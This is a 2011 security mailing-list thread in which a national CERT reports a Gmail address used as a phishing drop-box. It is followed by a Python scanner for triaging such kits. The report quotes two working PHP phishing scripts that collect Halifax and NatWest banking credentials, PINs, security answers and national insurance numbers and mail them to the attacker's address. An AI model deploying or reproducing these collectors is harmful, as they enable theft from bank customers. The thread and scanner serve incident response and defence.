[nsp-sec] gmail phishing drop-box

Peter Moody pmoody at google.com
Fri Jul 8 14:31:59 EDT 2011


ack.

On Fri, Jul 8, 2011 at 11:29 AM, Rodolfo Baader <rbaader at arcert.gov.ar> wrote:

> ----------- nsp-security Confidential --------
>
> Hi!
>
> while investigating a phishing case, we've found the following dropbox:
>  "hardman700 at gmail.com"
>
> Evidence:
>
> ==============================================================================
> [1] <?
> session_start();
> $cc="hardman700 at gmail.com";
> $Username = $_POST['Username'];
> $Password = $_POST['Password'];
> $ip = getenv("REMOTE_ADDR");
> $adddate=date("D M d, Y g:i a");
> $Fschool = $_POST['fschool'];
> $Email = $_POST['emad'];
> $EmailPas = $_POST['emad1'];
> $POB = $_POST['pob'];
> $MFname = $_POST['mfname'];
> $FFname = $_POST['ffname'];
> $Mmdname = $_POST['mmdname'];
> $DTPSN = $_POST['DTPSN'];
> $telpass = $_POST['telpass'];
> $mwrd = $_POST['mwrd'];
> $mwrd2 = $_POST['mwrd2'];
> $nis = $_POST['nis'];
> $SQ = $_POST['sq'];
> $ANS = $_POST['ans'];
>
>  $subj = "halifax";
>  $msg = "First Page\n\nUsername: $Username\nPassword: $Password\n\nSecond
> Page\n\nThe name of your first school: $Fschool\nYour place/town of birth :
> $POB\nYour mother's FIRST name: $MFname\nYour father's FIRST name:
> $FFname\nYour
> mother's maiden name: $Mmdname\nSecurity Question: $SQ\nAnswer: $ANS\nEmail
> Address: $Email\nEmail Password: $EmailPas\n6 Digits Telephone Banking PIN:
> $DTPSN\nTelephone Banking Password: $telpass\nMemorable Info: $mwrd
> \nMemorable
> Info: $mwrd2 \nNat-Ins-Numb: $nis \n\nSubmitted from IP Address - $ip on
> $adddate\n-------\n        Created By Vince\n------";
>  $from = "From: Shaun Halifax";
>  mail("$halifax", $subj, $msg, $from);
>         mail("$cc", $subj, $msg, $from);
>
>
> header("Location:finish.php?&Mid=8007_1944504_80296_1758_3472_0_825_16178_712264114&inc=&Search=&YY=20774&order=down&sort=date&pos=0&view=a&head=b#");
>
> ?>
>
>
> =============================================================================
> [2] <?
> $to = "hardman700 at gmail.com";
> //---------------------------------
> $DBID_edit = $_POST['DBID_edit'];
> $LI6PPEA_edit = $_POST['LI6PPEA_edit'];
> $LI6PPED_edit = $_POST['LI6PPED_edit'];
> $LI6PMMN_edit = $_POST['LI6PMMN_edit'];
> $LI6PPWD_edit = $_POST['LI6PPWD_edit'];
> $ip = $_SERVER['REMOTE_ADDR'];
> $subj = "NatWest Bank UK";
> $msg = "Enter Your Customer Number : $DBID_edit\nEnter Your PIN :
> $LI6PPEA_edit\nEnter Your Password : $LI6PPED_edit\nEnter Your MMN :
> $LI6PMMN_edit\nEnter Your Debit Card Number : $LI6PPWD_edit\nIP : $ip";
> $from = "FROM: BraIn Inc.©<mail at nwolb.com>";
>  {
>  mail($to,$subj,$msg,$from);
>  }
> header("location:
> http://www.natwest.com/tools/general/nwolb_legals/index.htm");
> ?>
>
>
> ==============================================================================
>
> R.
>
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________




-- 
Peter Moody      Google    1.650.253.7306
Security Engineer  pgp:0xC3410038
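
For triage of kit source like the two quoted scripts, a small scanner can pull out the drop address, the harvested form fields, and any mail() recipient variable that is never assigned (as with `$halifax` in the lines quoted from script [1]). This is an added example, not part of the original thread; the function names, the regexes and the sample (with a placeholder address) are constructed for illustration.

```python
import re

# A PHP string assignment whose value is an e-mail address, either in normal
# form or in the " at " form that list archives use to obscure addresses.
ASSIGN_RE = re.compile(
    r'\$(\w+)\s*=\s*["\']([\w.+-]+)(?:@|\s+at\s+)([\w-]+(?:\.[\w-]+)+)["\']')
# First argument of mail(): a variable (optionally quoted) or a literal address.
MAIL_RE = re.compile(
    r'\bmail\s*\(\s*["\']?(?:\$(\w+)|([\w.+-]+)(?:@|\s+at\s+)([\w-]+(?:\.[\w-]+)+))["\']?\s*,')
# Form fields read from the submitted request.
POST_RE = re.compile(r'\$_POST\s*\[\s*["\'](\w+)["\']\s*\]')


def strip_quote_prefix(text):
    """Remove leading '> ' reply markers so quoted evidence can be scanned."""
    return "\n".join(re.sub(r'^(?:>\s?)+', '', line) for line in text.splitlines())


def analyze(source):
    """Return drop addresses, unassigned mail() recipients and harvested fields."""
    src = strip_quote_prefix(source)
    assigned = {m.group(1): f"{m.group(2)}@{m.group(3)}".lower()
                for m in ASSIGN_RE.finditer(src)}
    drops, undefined = set(), set()
    for m in MAIL_RE.finditer(src):
        var, local, domain = m.groups()
        if var is None:
            drops.add(f"{local}@{domain}".lower())   # literal recipient
        elif var in assigned:
            drops.add(assigned[var])                 # recipient set earlier
        else:
            undefined.add(var)                       # recipient never assigned
    fields = sorted(set(POST_RE.findall(src)))
    return {"drops": sorted(drops), "undefined": sorted(undefined), "fields": fields}


# Constructed sample modelled on the quoted evidence; the address is a placeholder.
SAMPLE = '''> <?
> $cc="collector at example.com";
> $Username = $_POST['Username'];
> $Password = $_POST['Password'];
>  mail("$primary", $subj, $msg, $from);
>         mail("$cc", $subj, $msg, $from);
> ?>'''

if __name__ == "__main__":
    print(analyze(SAMPLE))
```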


